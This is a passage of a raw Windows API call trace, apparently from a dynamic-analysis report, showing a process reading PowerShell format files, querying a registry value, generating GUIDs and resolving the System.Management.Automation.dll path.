lpOverlapped=0x0 | out: lpBuffer=0x33d26f8*, lpNumberOfBytesRead=0xcd038*=0x1000, lpOverlapped=0x0) returned 1 [0135.432] ReadFile (in: hFile=0x308, lpBuffer=0x33d26f8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xcd038, lpOverlapped=0x0 | out: lpBuffer=0x33d26f8*, lpNumberOfBytesRead=0xcd038*=0x1000, lpOverlapped=0x0) returned 1 [0135.432] ReadFile (in: hFile=0x308, lpBuffer=0x33d26f8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xcd038, lpOverlapped=0x0 | out: lpBuffer=0x33d26f8*, lpNumberOfBytesRead=0xcd038*=0x1000, lpOverlapped=0x0) returned 1 [0135.433] ReadFile (in: hFile=0x308, lpBuffer=0x33d26f8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xcd038, lpOverlapped=0x0 | out: lpBuffer=0x33d26f8*, lpNumberOfBytesRead=0xcd038*=0x1000, lpOverlapped=0x0) returned 1 [0135.433] ReadFile (in: hFile=0x308, lpBuffer=0x33d26f8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xcd038, lpOverlapped=0x0 | out: lpBuffer=0x33d26f8*, lpNumberOfBytesRead=0xcd038*=0x1000, lpOverlapped=0x0) returned 1 [0135.433] ReadFile (in: hFile=0x308, lpBuffer=0x33d26f8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xcd038, lpOverlapped=0x0 | out: lpBuffer=0x33d26f8*, lpNumberOfBytesRead=0xcd038*=0x1000, lpOverlapped=0x0) returned 1 [0135.433] ReadFile (in: hFile=0x308, lpBuffer=0x33d26f8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xcd038, lpOverlapped=0x0 | out: lpBuffer=0x33d26f8*, lpNumberOfBytesRead=0xcd038*=0x1000, lpOverlapped=0x0) returned 1 [0135.433] ReadFile (in: hFile=0x308, lpBuffer=0x33d26f8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xcd038, lpOverlapped=0x0 | out: lpBuffer=0x33d26f8*, lpNumberOfBytesRead=0xcd038*=0x1000, lpOverlapped=0x0) returned 1 [0135.433] ReadFile (in: hFile=0x308, lpBuffer=0x33d26f8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xcd038, lpOverlapped=0x0 | out: lpBuffer=0x33d26f8*, lpNumberOfBytesRead=0xcd038*=0x1000, lpOverlapped=0x0) returned 1 [0135.434] ReadFile (in: hFile=0x308, lpBuffer=0x33d26f8, 
nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xcd038, lpOverlapped=0x0 | out: lpBuffer=0x33d26f8*, lpNumberOfBytesRead=0xcd038*=0x1000, lpOverlapped=0x0) returned 1 [0135.434] ReadFile (in: hFile=0x308, lpBuffer=0x33d26f8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xcd038, lpOverlapped=0x0 | out: lpBuffer=0x33d26f8*, lpNumberOfBytesRead=0xcd038*=0x1000, lpOverlapped=0x0) returned 1 [0135.434] ReadFile (in: hFile=0x308, lpBuffer=0x33d26f8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xcd038, lpOverlapped=0x0 | out: lpBuffer=0x33d26f8*, lpNumberOfBytesRead=0xcd038*=0x1000, lpOverlapped=0x0) returned 1 [0135.435] ReadFile (in: hFile=0x308, lpBuffer=0x33d26f8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xcd038, lpOverlapped=0x0 | out: lpBuffer=0x33d26f8*, lpNumberOfBytesRead=0xcd038*=0xbce, lpOverlapped=0x0) returned 1 [0135.435] ReadFile (in: hFile=0x308, lpBuffer=0x33d1e2e, nNumberOfBytesToRead=0x32, lpNumberOfBytesRead=0xcd038, lpOverlapped=0x0 | out: lpBuffer=0x33d1e2e*, lpNumberOfBytesRead=0xcd038*=0x0, lpOverlapped=0x0) returned 1 [0135.435] ReadFile (in: hFile=0x308, lpBuffer=0x33d26f8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xcd038, lpOverlapped=0x0 | out: lpBuffer=0x33d26f8*, lpNumberOfBytesRead=0xcd038*=0x0, lpOverlapped=0x0) returned 1 [0135.435] CloseHandle (hObject=0x308) returned 1 [0135.435] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\DotNetTypes.format.ps1xml", nBufferLength=0x105, lpBuffer=0xccd80, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\DotNetTypes.format.ps1xml", lpFilePart=0x0) returned 0x44 [0135.435] SetErrorMode (uMode=0x1) returned 0x1 [0135.435] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\DotNetTypes.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\dotnettypes.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0xccfe0 | out: 
lpFileInformation=0xccfe0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x67e0582f, ftCreationTime.dwHighDateTime=0x1ca03f8, ftLastAccessTime.dwLowDateTime=0x67e0582f, ftLastAccessTime.dwHighDateTime=0x1ca03f8, ftLastWriteTime.dwLowDateTime=0xe5e29f95, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x11bce)) returned 1 [0135.435] SetErrorMode (uMode=0x1) returned 0x1 [0135.436] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\DotNetTypes.format.ps1xml", nBufferLength=0x105, lpBuffer=0xccd10, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\DotNetTypes.format.ps1xml", lpFilePart=0x0) returned 0x44 [0135.436] CoTaskMemAlloc (cb=0x5a) returned 0x1b80a970 [0135.436] RegQueryValueExW (in: hKey=0x308, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0xcd01c, lpData=0x1b80a970, lpcbData=0xcd018*=0x56 | out: lpType=0xcd01c*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0xcd018*=0x56) returned 0x0 [0135.436] CoTaskMemFree (pv=0x1b80a970) [0135.436] RegCloseKey (hKey=0x308) returned 0x0 [0135.436] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\DotNetTypes.format.ps1xml", nBufferLength=0x105, lpBuffer=0xccd10, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\DotNetTypes.format.ps1xml", lpFilePart=0x0) returned 0x44 [0135.436] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\DotNetTypes.format.ps1xml", nBufferLength=0x105, lpBuffer=0xccbc0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\DotNetTypes.format.ps1xml", lpFilePart=0x0) returned 0x44 [0135.439] CoCreateGuid (in: pguid=0xcd2f0 | out: pguid=0xcd2f0*(Data1=0x42384cbf, Data2=0xd261, Data3=0x4952, Data4=([0]=0xb1, [1]=0x6e, [2]=0xb4, [3]=0xf1, [4]=0xeb, [5]=0x5b, [6]=0xce, [7]=0x57))) returned 0x0 [0135.439] CoCreateGuid (in: pguid=0xcd2f0 | out: 
pguid=0xcd2f0*(Data1=0x52bc2447, Data2=0x730b, Data3=0x4f40, Data4=([0]=0x8a, [1]=0x8f, [2]=0x7a, [3]=0x8, [4]=0x42, [5]=0x7a, [6]=0x27, [7]=0x13))) returned 0x0 [0135.439] CoCreateGuid (in: pguid=0xcd2f0 | out: pguid=0xcd2f0*(Data1=0x2052f82d, Data2=0x725, Data3=0x4baf, Data4=([0]=0x85, [1]=0x59, [2]=0x5b, [3]=0x26, [4]=0xd5, [5]=0xed, [6]=0x68, [7]=0x5a))) returned 0x0 [0135.440] CoCreateGuid (in: pguid=0xcd2f0 | out: pguid=0xcd2f0*(Data1=0x6d6ed309, Data2=0x842e, Data3=0x4299, Data4=([0]=0x91, [1]=0x22, [2]=0xd6, [3]=0x4e, [4]=0x22, [5]=0xd6, [6]=0x76, [7]=0x76))) returned 0x0 [0135.440] CoCreateGuid (in: pguid=0xcd2f0 | out: pguid=0xcd2f0*(Data1=0x4e1ea99f, Data2=0x89a7, Data3=0x4d15, Data4=([0]=0xb0, [1]=0x7a, [2]=0xd6, [3]=0x18, [4]=0xb6, [5]=0x9c, [6]=0x49, [7]=0x7d))) returned 0x0 [0135.441] CoCreateGuid (in: pguid=0xcd2f0 | out: pguid=0xcd2f0*(Data1=0x4259f4cd, Data2=0xf43d, Data3=0x4095, Data4=([0]=0xbd, [1]=0xc, [2]=0x4c, [3]=0x28, [4]=0xd4, [5]=0xa, [6]=0xb3, [7]=0x64))) returned 0x0 [0135.441] VirtualQuery (in: lpAddress=0xcbca0, lpBuffer=0xccb60, dwLength=0x30 | out: lpBuffer=0xccb60*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0xfffff8a0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0135.442] CoCreateGuid (in: pguid=0xcd2f0 | out: pguid=0xcd2f0*(Data1=0x52c6ef59, Data2=0x8f3f, Data3=0x418f, Data4=([0]=0xb1, [1]=0xa1, [2]=0x51, [3]=0x69, [4]=0xd7, [5]=0xcd, [6]=0x3d, [7]=0xcb))) returned 0x0 [0135.442] VirtualQuery (in: lpAddress=0xcbca0, lpBuffer=0xccb60, dwLength=0x30 | out: lpBuffer=0xccb60*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0xfffff8a0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0135.443] VirtualQuery (in: lpAddress=0xcbca0, lpBuffer=0xccb60, dwLength=0x30 | out: lpBuffer=0xccb60*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, 
__alignment1=0xfffff8a0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0135.444] CoCreateGuid (in: pguid=0xcd2f0 | out: pguid=0xcd2f0*(Data1=0xedab97e7, Data2=0xab74, Data3=0x43ce, Data4=([0]=0xbc, [1]=0x22, [2]=0xb3, [3]=0x83, [4]=0x2e, [5]=0x74, [6]=0xbd, [7]=0x22))) returned 0x0 [0135.444] CoCreateGuid (in: pguid=0xcd2f0 | out: pguid=0xcd2f0*(Data1=0xd429ceb3, Data2=0x83db, Data3=0x437e, Data4=([0]=0x92, [1]=0x5d, [2]=0xc3, [3]=0x21, [4]=0x9a, [5]=0x88, [6]=0xe2, [7]=0x6b))) returned 0x0 [0135.445] CoCreateGuid (in: pguid=0xcd2f0 | out: pguid=0xcd2f0*(Data1=0x47955e36, Data2=0xf0e2, Data3=0x4016, Data4=([0]=0xa1, [1]=0x9a, [2]=0x4d, [3]=0x97, [4]=0x27, [5]=0xd1, [6]=0xea, [7]=0xe5))) returned 0x0 [0135.445] CoCreateGuid (in: pguid=0xcd2f0 | out: pguid=0xcd2f0*(Data1=0x776e9266, Data2=0x95b8, Data3=0x4f6a, Data4=([0]=0xab, [1]=0xf1, [2]=0xab, [3]=0xdd, [4]=0x20, [5]=0x98, [6]=0xbb, [7]=0xd5))) returned 0x0 [0135.445] VirtualQuery (in: lpAddress=0xcbca0, lpBuffer=0xccb60, dwLength=0x30 | out: lpBuffer=0xccb60*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0xfffff8a0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0135.445] CoCreateGuid (in: pguid=0xcd2f0 | out: pguid=0xcd2f0*(Data1=0x2ab932fb, Data2=0x79b7, Data3=0x4a32, Data4=([0]=0xb4, [1]=0xac, [2]=0x77, [3]=0x9e, [4]=0x11, [5]=0xff, [6]=0x46, [7]=0xa8))) returned 0x0 [0135.446] VirtualQuery (in: lpAddress=0xcbca0, lpBuffer=0xccb60, dwLength=0x30 | out: lpBuffer=0xccb60*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0xfffff8a0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0135.446] VirtualQuery (in: lpAddress=0xcbca0, lpBuffer=0xccb60, dwLength=0x30 | out: lpBuffer=0xccb60*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0xfffff8a0, RegionSize=0x5000, State=0x1000, 
Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0135.446] VirtualQuery (in: lpAddress=0xcbca0, lpBuffer=0xccb60, dwLength=0x30 | out: lpBuffer=0xccb60*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0xfffff8a0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0135.447] VirtualQuery (in: lpAddress=0xcbca0, lpBuffer=0xccb60, dwLength=0x30 | out: lpBuffer=0xccb60*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0xfffff8a0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0135.447] VirtualQuery (in: lpAddress=0xcbca0, lpBuffer=0xccb60, dwLength=0x30 | out: lpBuffer=0xccb60*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0xfffff8a0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0135.448] CoCreateGuid (in: pguid=0xcd2f0 | out: pguid=0xcd2f0*(Data1=0x52965e09, Data2=0x4d0e, Data3=0x4e24, Data4=([0]=0x9f, [1]=0x6c, [2]=0x72, [3]=0x2f, [4]=0x31, [5]=0x9e, [6]=0xcb, [7]=0x3d))) returned 0x0 [0135.448] CoCreateGuid (in: pguid=0xcd2f0 | out: pguid=0xcd2f0*(Data1=0x49f85862, Data2=0x311, Data3=0x4ea8, Data4=([0]=0x95, [1]=0x35, [2]=0x59, [3]=0x12, [4]=0x33, [5]=0x8b, [6]=0x18, [7]=0x20))) returned 0x0 [0135.449] CoCreateGuid (in: pguid=0xcd2f0 | out: pguid=0xcd2f0*(Data1=0xcbcb4cde, Data2=0x6b38, Data3=0x48c9, Data4=([0]=0x85, [1]=0xd6, [2]=0x22, [3]=0x60, [4]=0xe4, [5]=0x89, [6]=0x8b, [7]=0xc6))) returned 0x0 [0135.449] CoCreateGuid (in: pguid=0xcd2f0 | out: pguid=0xcd2f0*(Data1=0x5f94d3f2, Data2=0x43d9, Data3=0x4748, Data4=([0]=0x85, [1]=0xfe, [2]=0x2, [3]=0xa2, [4]=0xbd, [5]=0xde, [6]=0x94, [7]=0xd))) returned 0x0 [0135.449] CoCreateGuid (in: pguid=0xcd2f0 | out: pguid=0xcd2f0*(Data1=0xef1b4bbd, Data2=0x63c3, Data3=0x4651, Data4=([0]=0x83, [1]=0xb2, [2]=0x7e, [3]=0xaf, [4]=0xc8, [5]=0x6d, [6]=0xe9, [7]=0x7d))) returned 0x0 
[0135.450] VirtualQuery (in: lpAddress=0xcbf60, lpBuffer=0xcce20, dwLength=0x30 | out: lpBuffer=0xcce20*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0xfffff8a0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0135.450] CoCreateGuid (in: pguid=0xcd2f0 | out: pguid=0xcd2f0*(Data1=0xcd26114c, Data2=0x4b0a, Data3=0x4948, Data4=([0]=0xbd, [1]=0xcc, [2]=0x87, [3]=0xf6, [4]=0xfd, [5]=0x70, [6]=0x3b, [7]=0xa8))) returned 0x0 [0135.450] CoCreateGuid (in: pguid=0xcd2f0 | out: pguid=0xcd2f0*(Data1=0x57e524ac, Data2=0x313f, Data3=0x48e8, Data4=([0]=0xbd, [1]=0x9d, [2]=0xc6, [3]=0x7, [4]=0xf0, [5]=0x48, [6]=0xd6, [7]=0x0))) returned 0x0 [0135.451] CoCreateGuid (in: pguid=0xcd2f0 | out: pguid=0xcd2f0*(Data1=0x23f16f80, Data2=0x83f6, Data3=0x4c98, Data4=([0]=0xb3, [1]=0x80, [2]=0x66, [3]=0x5b, [4]=0xd4, [5]=0xa1, [6]=0x15, [7]=0xdd))) returned 0x0 [0135.451] CoCreateGuid (in: pguid=0xcd2f0 | out: pguid=0xcd2f0*(Data1=0x201813af, Data2=0xbaa6, Data3=0x4f54, Data4=([0]=0xa3, [1]=0xf8, [2]=0x82, [3]=0x5, [4]=0x3f, [5]=0xb, [6]=0x65, [7]=0x7b))) returned 0x0 [0135.451] CoCreateGuid (in: pguid=0xcd2f0 | out: pguid=0xcd2f0*(Data1=0xd8afbe05, Data2=0x1d71, Data3=0x4cd2, Data4=([0]=0xa3, [1]=0x90, [2]=0x11, [3]=0x3f, [4]=0xef, [5]=0x6b, [6]=0x14, [7]=0xc2))) returned 0x0 [0135.452] CoCreateGuid (in: pguid=0xcd2f0 | out: pguid=0xcd2f0*(Data1=0x7aa47b5f, Data2=0x14f4, Data3=0x439f, Data4=([0]=0x80, [1]=0xe1, [2]=0xe0, [3]=0x4, [4]=0x79, [5]=0x9d, [6]=0x1, [7]=0xd7))) returned 0x0 [0135.452] CoCreateGuid (in: pguid=0xcd2f0 | out: pguid=0xcd2f0*(Data1=0xad2700c8, Data2=0x8bfd, Data3=0x4640, Data4=([0]=0x83, [1]=0xc4, [2]=0x7, [3]=0x6a, [4]=0xc1, [5]=0xbf, [6]=0x2e, [7]=0x69))) returned 0x0 [0135.452] CoCreateGuid (in: pguid=0xcd2f0 | out: pguid=0xcd2f0*(Data1=0x7f32d403, Data2=0x827, Data3=0x49d6, Data4=([0]=0x9c, [1]=0xb8, [2]=0x79, [3]=0xe5, [4]=0x3d, [5]=0x5f, [6]=0x11, [7]=0xcc))) returned 0x0 [0135.453] 
CoCreateGuid (in: pguid=0xcd2f0 | out: pguid=0xcd2f0*(Data1=0x1e7793f0, Data2=0x1c18, Data3=0x4b49, Data4=([0]=0xaf, [1]=0x66, [2]=0xf5, [3]=0x70, [4]=0x3c, [5]=0x8b, [6]=0x79, [7]=0xb7))) returned 0x0 [0135.453] CoCreateGuid (in: pguid=0xcd2f0 | out: pguid=0xcd2f0*(Data1=0x1e315d51, Data2=0xf49a, Data3=0x4524, Data4=([0]=0xaf, [1]=0xd0, [2]=0x22, [3]=0xba, [4]=0xfd, [5]=0x7d, [6]=0xc2, [7]=0xd0))) returned 0x0 [0135.454] CoCreateGuid (in: pguid=0xcd2f0 | out: pguid=0xcd2f0*(Data1=0x2d5bcfde, Data2=0xeda0, Data3=0x41a3, Data4=([0]=0xbf, [1]=0x30, [2]=0x3, [3]=0xde, [4]=0x2d, [5]=0x5e, [6]=0xf1, [7]=0xe8))) returned 0x0 [0135.454] CoCreateGuid (in: pguid=0xcd2f0 | out: pguid=0xcd2f0*(Data1=0xc50397d2, Data2=0xd72f, Data3=0x4f6f, Data4=([0]=0x9f, [1]=0x71, [2]=0x80, [3]=0x83, [4]=0xfe, [5]=0x88, [6]=0x88, [7]=0x54))) returned 0x0 [0135.454] CoCreateGuid (in: pguid=0xcd2f0 | out: pguid=0xcd2f0*(Data1=0xfe066532, Data2=0x1785, Data3=0x4908, Data4=([0]=0x9f, [1]=0x69, [2]=0xec, [3]=0xe6, [4]=0x5, [5]=0x80, [6]=0x27, [7]=0xfd))) returned 0x0 [0135.454] CoCreateGuid (in: pguid=0xcd2f0 | out: pguid=0xcd2f0*(Data1=0x8ad3a398, Data2=0xe6ca, Data3=0x403c, Data4=([0]=0xbc, [1]=0xed, [2]=0xfe, [3]=0x6f, [4]=0xca, [5]=0x89, [6]=0x9d, [7]=0xe1))) returned 0x0 [0135.455] CoCreateGuid (in: pguid=0xcd2f0 | out: pguid=0xcd2f0*(Data1=0x393ccc36, Data2=0x8940, Data3=0x43ab, Data4=([0]=0x9b, [1]=0x7d, [2]=0x4d, [3]=0x6f, [4]=0x8f, [5]=0x2f, [6]=0xec, [7]=0x4c))) returned 0x0 [0135.455] CoCreateGuid (in: pguid=0xcd2f0 | out: pguid=0xcd2f0*(Data1=0xdcf96a5f, Data2=0x4508, Data3=0x4c69, Data4=([0]=0x98, [1]=0xa8, [2]=0xfe, [3]=0xfc, [4]=0x15, [5]=0x42, [6]=0x5a, [7]=0x3))) returned 0x0 [0135.455] CoCreateGuid (in: pguid=0xcd2f0 | out: pguid=0xcd2f0*(Data1=0x36023ddd, Data2=0xfbee, Data3=0x4baa, Data4=([0]=0xb7, [1]=0x13, [2]=0x5d, [3]=0x66, [4]=0xfe, [5]=0x99, [6]=0x6b, [7]=0x53))) returned 0x0 [0135.456] CoCreateGuid (in: pguid=0xcd2f0 | out: pguid=0xcd2f0*(Data1=0x82f0f60b, Data2=0x1c89, 
Data3=0x40c3, Data4=([0]=0xb6, [1]=0x6c, [2]=0xe8, [3]=0xb7, [4]=0x3a, [5]=0xda, [6]=0x91, [7]=0x5))) returned 0x0 [0135.456] CoCreateGuid (in: pguid=0xcd2f0 | out: pguid=0xcd2f0*(Data1=0xed1defec, Data2=0xd75e, Data3=0x4803, Data4=([0]=0xaf, [1]=0xcc, [2]=0x36, [3]=0x96, [4]=0xed, [5]=0x8b, [6]=0x3c, [7]=0xa4))) returned 0x0 [0135.456] VirtualQuery (in: lpAddress=0xcbca0, lpBuffer=0xccb60, dwLength=0x30 | out: lpBuffer=0xccb60*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0xfffff8a0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0135.457] VirtualQuery (in: lpAddress=0xcbca0, lpBuffer=0xccb60, dwLength=0x30 | out: lpBuffer=0xccb60*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0xfffff8a0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0135.458] VirtualQuery (in: lpAddress=0xcbca0, lpBuffer=0xccb60, dwLength=0x30 | out: lpBuffer=0xccb60*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0xfffff8a0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0135.460] CoCreateGuid (in: pguid=0xcd2f0 | out: pguid=0xcd2f0*(Data1=0x1dc8bb56, Data2=0x6490, Data3=0x4ed8, Data4=([0]=0xb7, [1]=0xc0, [2]=0xce, [3]=0xa8, [4]=0x93, [5]=0x3d, [6]=0x40, [7]=0x42))) returned 0x0 [0135.460] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\FileSystem.format.ps1xml", nBufferLength=0x105, lpBuffer=0xccab0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\FileSystem.format.ps1xml", lpFilePart=0x0) returned 0x43 [0135.460] SetErrorMode (uMode=0x1) returned 0x1 [0135.460] SetErrorMode (uMode=0x1) returned 0x1 [0135.460] GetFileType (hFile=0x308) returned 0x1 [0135.461] ReadFile (in: hFile=0x308, lpBuffer=0x34e2ce0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xcd038, lpOverlapped=0x0 | out: 
lpBuffer=0x34e2ce0*, lpNumberOfBytesRead=0xcd038*=0x1000, lpOverlapped=0x0) returned 1 [0135.462] ReadFile (in: hFile=0x308, lpBuffer=0x34e2ce0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xcd038, lpOverlapped=0x0 | out: lpBuffer=0x34e2ce0*, lpNumberOfBytesRead=0xcd038*=0x1000, lpOverlapped=0x0) returned 1 [0135.463] ReadFile (in: hFile=0x308, lpBuffer=0x34e2ce0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xcd038, lpOverlapped=0x0 | out: lpBuffer=0x34e2ce0*, lpNumberOfBytesRead=0xcd038*=0x1000, lpOverlapped=0x0) returned 1 [0135.463] ReadFile (in: hFile=0x308, lpBuffer=0x34e2ce0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xcd038, lpOverlapped=0x0 | out: lpBuffer=0x34e2ce0*, lpNumberOfBytesRead=0xcd038*=0x1000, lpOverlapped=0x0) returned 1 [0135.463] ReadFile (in: hFile=0x308, lpBuffer=0x34e2ce0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xcd038, lpOverlapped=0x0 | out: lpBuffer=0x34e2ce0*, lpNumberOfBytesRead=0xcd038*=0x1000, lpOverlapped=0x0) returned 1 [0135.463] ReadFile (in: hFile=0x308, lpBuffer=0x34e2ce0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xcd038, lpOverlapped=0x0 | out: lpBuffer=0x34e2ce0*, lpNumberOfBytesRead=0xcd038*=0x1000, lpOverlapped=0x0) returned 1 [0135.464] ReadFile (in: hFile=0x308, lpBuffer=0x34e2ce0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xcd038, lpOverlapped=0x0 | out: lpBuffer=0x34e2ce0*, lpNumberOfBytesRead=0xcd038*=0x119, lpOverlapped=0x0) returned 1 [0135.464] ReadFile (in: hFile=0x308, lpBuffer=0x34e2ce0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xcd038, lpOverlapped=0x0 | out: lpBuffer=0x34e2ce0*, lpNumberOfBytesRead=0xcd038*=0x0, lpOverlapped=0x0) returned 1 [0135.464] CloseHandle (hObject=0x308) returned 1 [0135.464] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\FileSystem.format.ps1xml", nBufferLength=0x105, lpBuffer=0xccd80, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\FileSystem.format.ps1xml", 
lpFilePart=0x0) returned 0x43 [0135.464] SetErrorMode (uMode=0x1) returned 0x1 [0135.464] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\FileSystem.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\filesystem.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0xccfe0 | out: lpFileInformation=0xccfe0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x67e2b98c, ftCreationTime.dwHighDateTime=0x1ca03f8, ftLastAccessTime.dwLowDateTime=0x67e2b98c, ftLastAccessTime.dwHighDateTime=0x1ca03f8, ftLastWriteTime.dwLowDateTime=0xe5e76251, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x6119)) returned 1 [0135.464] SetErrorMode (uMode=0x1) returned 0x1 [0135.464] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\FileSystem.format.ps1xml", nBufferLength=0x105, lpBuffer=0xccd10, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\FileSystem.format.ps1xml", lpFilePart=0x0) returned 0x43 [0135.465] CoTaskMemAlloc (cb=0x5a) returned 0x1b80a970 [0135.465] RegQueryValueExW (in: hKey=0x308, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0xcd01c, lpData=0x1b80a970, lpcbData=0xcd018*=0x56 | out: lpType=0xcd01c*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0xcd018*=0x56) returned 0x0 [0135.465] CoTaskMemFree (pv=0x1b80a970) [0135.465] RegCloseKey (hKey=0x308) returned 0x0 [0135.465] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\FileSystem.format.ps1xml", nBufferLength=0x105, lpBuffer=0xccd10, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\FileSystem.format.ps1xml", lpFilePart=0x0) returned 0x43 [0135.465] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\FileSystem.format.ps1xml", nBufferLength=0x105, lpBuffer=0xccbc0, lpFilePart=0x0 | out: 
lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\FileSystem.format.ps1xml", lpFilePart=0x0) returned 0x43 [0135.465] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcc650, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0135.466] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcc5a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0135.466] GetFullPathNameW (in: 